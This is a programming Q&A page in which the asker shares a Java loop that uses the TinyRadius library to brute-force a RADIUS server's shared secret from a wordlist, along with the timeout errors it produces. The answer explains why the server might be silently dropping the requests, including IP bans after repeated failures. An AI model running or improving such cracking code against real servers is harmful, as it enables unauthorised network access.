Search code examples
javaradius-protocol

Unable To Connect To RADIUS Server

So I have a RADIUS server running at 10.0.0.15. I have to brute-force its shared secret. I am using the TinyRaidus Java library.

Here is my code:

String s = "big line...";
String[] words = s.split("\\W+");
        String host, userName, password;
        userName = "admin";
        password = "pass";
        host = "10.0.0.15";
        int count = words.length;
        for (String word : words) {
            System.err.println("Left: " + count);
            RadiusClient rc = new RadiusClient(host, word);
            try {
                if (rc.authenticate(userName, password)) {
                    System.out.print("Cracked. Secret is: " + word);
                    break;
                }
            } catch (IOException ex) {
                Logger.getLogger(RadiusBrute.class.getName()).log(Level.SEVERE, null, ex);
            } catch (RadiusException ex) {
                Logger.getLogger(RadiusBrute.class.getName()).log(Level.SEVERE, null, ex);
            }
        }

However, everytime I run this, I get this error:

Jun 21, 2016 12:48:28 AM org.tinyradius.util.RadiusClient communicate
SEVERE: communication failure (timeout), no more retries
Jun 21, 2016 12:48:28 AM radiusbrute.RadiusBrute main
SEVERE: null
java.net.SocketTimeoutException: Receive timed out
        at java.net.PlainDatagramSocketImpl.receive0(Native Method)
        at java.net.AbstractPlainDatagramSocketImpl.receive(AbstractPlainDatagramSocketImpl.java:144)
        at java.net.DatagramSocket.receive(DatagramSocket.java:812)
        at org.tinyradius.util.RadiusClient.communicate(RadiusClient.java:249)
        at org.tinyradius.util.RadiusClient.authenticate(RadiusClient.java:83)
        at org.tinyradius.util.RadiusClient.authenticate(RadiusClient.java:65)
        at radiusbrute.RadiusBrute.main(RadiusBrute.java:284)

Here have I done wrong? Thanks.

Solution

  • It looks like your RADIUS server silently discarded your RADIUS Access-Request. Depending on the RADIUS server implementation the reason could be one of the following:

    1. RADIUS server doesn't have the host where you send your requests from as configured client: from RADIUS RFC 2865:

    A request from a client for which the RADIUS server does not have a shared secret MUST be silently discarded. 2. You sent too many failed requests from your client and RADIUS server banned your client by its IP address and drops all subsequent requests 3. (Unlikely) RADIUS server is configured to drop request with wrong username/password instead of sending RADIUS Access-Reject